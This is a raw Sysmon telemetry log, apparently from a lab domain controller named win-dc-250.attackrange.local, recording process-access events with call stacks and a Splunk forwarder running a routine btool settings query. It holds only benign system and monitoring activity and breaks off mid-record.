13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4325-6000-C100-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4325-6000-C000-000000009A01}22884344C:\Windows\system32\cmd.exe{08A6967A-4325-6000-C100-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.825{08A6967A-4325-6000-C100-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4325-6000-C000-000000009A01}2288C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4325-6000-C000-000000009A01}2288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4325-6000-C000-000000009A01}2288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4325-6000-BF00-000000009A01}18403796C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4325-6000-C000-000000009A01}2288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.819{08A6967A-4325-6000-C000-000000009A01}2288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.809{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.793{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\